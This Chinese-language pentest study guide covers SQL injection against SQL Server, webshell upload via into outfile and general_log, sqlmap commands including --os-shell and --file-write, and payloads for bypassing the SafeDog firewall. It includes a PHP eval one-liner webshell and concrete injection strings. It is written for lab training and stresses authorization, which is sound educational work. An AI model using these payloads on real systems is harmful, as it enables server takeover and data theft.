SQL 注入全流程详解：多数据库、GetShell 及防护绕过

3. SQL Server 数据库注入

• 数据库判断方法：URL 后缀为 aspx，访问系统表 sysobjects 回显正常即可判断。
• 核心系统表：
  • sysdatabases：存于 master 库，记录所有库名 / 库 ID。
  • sysobjects：每个库都有，xtype='U' 为用户创建的表，name 为表名、id 为表 ID。
  • syscolumns：每个库都有，name 为字段名、id 为表 ID、colid 为字段 ID，可通过表 ID 联动查询字段。
• 专属函数：DB_NAME()（返回当前库名）、char()（ASCII 转字符）、ascii()（字符转 ASCII 值）、object_id()（返回表 ID 对应的表名）、col_name()（通过表 ID + 字段 ID 返回字段名）、substring()（字符串截取）。
• 注入方式：
  • 联合注入步骤：
    1. 判断注入类型（数字型 / 字符型）；
    2. order by N 判断列数（如 13 列）；
    3. 判断回显位（需列数和列类型完全一致，先用 null 占位，再用数字逐个验证类型，加 union all 避免去重报错）；
    4. 通过系统表枚举库→表→字段→数据（库表连接用两个点 ..，引号被过滤时可将内容转为十六进制）。
  • 报错注入：利用'字符型转 int 类型失败'的报错特性，拼接 1=(查询语句) 带出数据，可获取数据库版本、库名、表名、字段名、数据等。
  • 布尔盲注：思路与 Access 一致，先构造语句→拼接方式→构造判断表达式，用 count 判断数据数量、len 判断字段长度、substring 截取字符、ascii 转值遍历猜解，无 limit，需用 not in 实现多行数据获取（可借助 BP 工具自动化）。

（二）SQL 注入 GetShell 全方法详解

• 核心概念：
  • shell：命令行环境（如 Windows CMD、Linux 终端）。
  • WebShell：脚本形式的命令行执行环境（如 PHP 一句话木马 <?php @eval($_GET[1]);?>，1 为连接密码）。
  • getshell：通过 SQL 注入、文件上传等漏洞，将 WebShell 上传至 Web 服务器并解析，获得服务器命令执行环境和控制权。
• 通用前提：知道网站绝对路径、未对引号做转义、数据库有写权限。
• 具体 getshell 方法：
  1. 数据库函数写入：
     • 基础函数：into outfile（写文本文件）、into dumpfile（写二进制文件）。
     • 直接写入：select '一句话木马' into outfile '网站绝对路径/木马.php' --+。
     • 结合联合查询：-1 union select 1,'一句话木马' into outfile '路径' --+（需保证联合查询列数与原查询一致）。
     • 结合特殊关键字：
       • lines terminated by：设置行尾字符，写入木马；
       • lines starting by：设置行首字符，写入木马；
       • fields/column terminated by：设置字段分隔符，写入木马。
  2. 数据表写入：
     • 前提：网站有堆叠注入 / PHPMyAdmin 权限 + 数据库基本权限。
     • 步骤：
       1. 堆叠注入插入木马：1'; insert into 表名 (字段名) values('一句话木马') --+；
       2. 调整字段长度：修改数据表字段长度（如从 20 改为 50），避免木马被截取；
       3. 导出文件：select 字段名 from 表名 where 条件 into outfile '网站绝对路径/木马.php' --+。
  3. 数据库日志写入：
     • 前提：堆叠注入 / PHPMyAdmin 权限 + 数据库基本权限。
     • 步骤：
       1. 开启日志：set global general_log = on；
       2. 查看日志路径：show variables like '%general_log_file%'；
       3. 重置日志路径：set global general_log_file = '网站绝对路径/木马.php'；
       4. 写入木马：select '一句话木马'（日志自动记录操作，写入木马）。
  4. SQLMap 工具写入：--os-shell 命令一键写入 WebShell。
• 实操作业要求：
  • 靶场：SQL 注入闯关靶场（至少 30 关）、皮卡丘、DVWA；
  • 要求：记录步骤 + 截图，思路为找注入点→判类型→闭合语句→获数据→getshell。

（三）SQLMap 工具使用全解析

• 工具特性：开源渗透测试工具，支持 MySQL/Access/SQL Server 等主流数据库，可自动探测 / 利用 SQL 注入漏洞，实现脱库、执行系统命令、getshell。
• 基础使用方法：
  • 环境准备：解压工具后，在工具目录打开 CMD，通过 python sqlmap.py 调用（Python2/3 均可，根据版本调整命令）。
• 核心命令及作用：
  1. 目标指定：
     • sqlmap -u "URL"：探测 URL 中的注入点，判断注入类型和数据库。
     • sqlmap -r 数据包.txt：加载抓包文件，探测 POST 注入或带 Cookie 的注入。
     • sqlmap -m URL 列表.txt：从文本文件中读取多个 URL，批量探测。
  2. 数据枚举：
     • sqlmap -u "URL" --dbs：枚举所有数据库名。
     • sqlmap -u "URL" -D 数据库名 --tables：枚举指定数据库的表名。
     • sqlmap -u "URL" -D 数据库名 -T 表名 --columns：枚举指定表的字段名。
     • sqlmap -u "URL" -D 数据库名 -T 表名 -C 字段名 --dump：导出指定字段数据（自动解码 MD5 等简单加密）。
  3. getshell：
     • sqlmap -u "URL" --os-shell：自动写入一句话木马，需知道网站绝对路径和写权限。
     • sqlmap -u "URL" --file-write 本地文件 --file-dest 目标路径：上传本地文件（如木马）到目标服务器。
  4. 探测配置：
     • sqlmap -u "URL" -v 3：设置详细输出级别（3 级显示注入 payload）。
     • sqlmap -u "URL" --level 3：设置探测等级（≥2 级探测 Cookie，≥3 级探测 User-Agent/Referer）。
     • sqlmap -u "URL" --risk 2：设置风险等级（1 级测试基础语句，2 级增加时间盲注，3 级增加or语句注入，风险高需慎用）。
  5. 绕过防护：
     • sqlmap -u "URL" --random-agent：随机生成 User-Agent，绕过 User-Agent 拦截。
     • sqlmap -u "URL" --delay 1：设置请求延迟（1 秒），模仿正常访问。
     • sqlmap -u "URL" --tamper 脚本名：使用 tamper 脚本混淆注入语句（如unionalltounion.py替换union all为union）。
  6. 其他常用：
     • sqlmap -u "URL" --cookie "Cookie 值"：携带 Cookie 探测（需登录的注入点）。
     • sqlmap -u "URL" --batch：自动选择默认选项，无需手动交互。
     • sqlmap -u "URL" --current-db：查看当前数据库名。
     • sqlmap -u "URL" --current-user：查看当前数据库用户。

（四）安全狗绕过全方法详解

• 环境准备：
  • 安全狗安装：选择英文路径，关闭开机自启，管理员身份运行（无需注册即可使用）。
  • Apache 服务部署：PHP study 集成环境，管理员身份安装，80 端口冲突时通过 netstat -ano 查占用进程并关闭（系统进程不可关），安装命令 httpd -k install -n "Apache2.4"，卸载命令 sc delete Apache2.4。
  • 防护验证：输入 ID=1 and 1=1 --+，触发'请求参数不合法'拦截则生效。
• 绕狗核心原理：安全狗基于黑名单拦截 SQL 注入关键字（and/or/order by等），绕狗核心是替换关键字或添加干扰内容，让安全狗无法识别。
• 4 种核心绕狗方式：
  1. 内联注释绕过：
     • 格式：/*!5 位数字（<MySQL 版本，带 44 绕过率高）+ 关键字*/；
     • 示例：ID=1/*!44244and*/1=1 --+；
     • 关键：5 位数字需小于 MySQL 版本，带'44'可提高绕过概率。
  2. 内联反向思维绕过：
     • 格式：关键字/*!5 位数字（>MySQL 版本）+ 干扰内容*/关键字；
     • 示例：ID=1ord/*!58888xxx*/er by 3 --+；
     • 关键：干扰内容可任意，核心是拆分关键字，干扰安全狗识别。
  3. GET 参数污染绕过：
     • 格式：ID=/*假参数*/正常参数/*假参数*/；
     • 示例：ID=/*a=1*/1/*b=2*/and 1=1 --+；
     • 关键：仅适用于 GET 传参，假参数名任意，用/*和*/包裹干扰内容。
  4. URL 编码结合注释绕过：
     • 格式：/*%16 进制字符 + 干扰内容*/关键字；
     • 示例：ID=/*%0Aand%0A*/1=1 --+（%0A为换行符编码）；
     • 常用 URL 编码：单引号%27、空格%20、and符%26、or符%7C。
• 实操技巧：
  • 关键字替换：and→&&/%26%26，or→||/%7C%7C，order by→group by。
  • 组合绕过：内联注释 + URL 编码（如/*!%0Aand%0A*/），提高绕过成功率。

二、SQL 注入全场景解题步骤（通用 + 专属）

（一）通用核心步骤（所有数据库适用）

1. 注入点探测与数据库类型判断

2. 注入核心操作（查列数→找回显位→枚举数据）

3. getshell 操作（可选，进阶步骤）

4. 绕过防护（若存在安全狗等防护）

（二）各数据库专属做题步骤

1. MySQL 专属步骤

• 若存在堆叠注入（mysqli_multi_query函数）：可直接执行多语句，优先尝试文件读写（load_file/into outfile）。
• 防御绕过优先级：预编译＞编码＞过滤，新开发项目优先使用预编译。

2. Access 专属步骤

• 联合注入必须拼接from 表名，表名猜解优先尝试admin、user、member等常见名称。
• 布尔盲注获取多行数据时，用not in排除已取数据（如select top 1 username from admin where username not in (select top 1 username from admin)）。

3. SQL Server 专属步骤

• 联合查询需严格匹配列类型，先用null占位，再用数字 / 字符串逐个验证（如数字型列用1，字符型列用'a'）。
• 报错注入优先使用'字符转 int 失败'特性，拼接1=(查询语句)快速获取数据。

三、关键注意事项（避坑指南）

1. 路径与权限：
   • 文件读写必须使用绝对路径，MySQL 需配置secure_file_priv=并重启服务。
   • Access 表 / 字段猜解需结合开发者习惯，避免盲目尝试。
2. 语法差异：
   • 函数差异：MySQL 用length()，Access 用len()，SQL Server 用len()。
   • 多行数据获取：MySQL 用limit m,n，Access/SQL Server 用top 1 + not in。
3. 工具使用：
   • SQLMap 探测前先手动验证注入点，避免工具误判。
   • --os-shell等高危命令仅在测试环境使用，真实场景禁用。
4. 防护绕过：
   • 避免过度依赖单一绕狗方式，优先组合使用（如内联注释 + URL 编码）。
   • 关键字替换后需验证语法有效性，避免语句报错。
5. 数据安全：
   • 导出的敏感数据（密码）需加密存储，测试后删除 WebShell 文件。
   • 渗透测试需获得授权，禁止未授权测试他人网站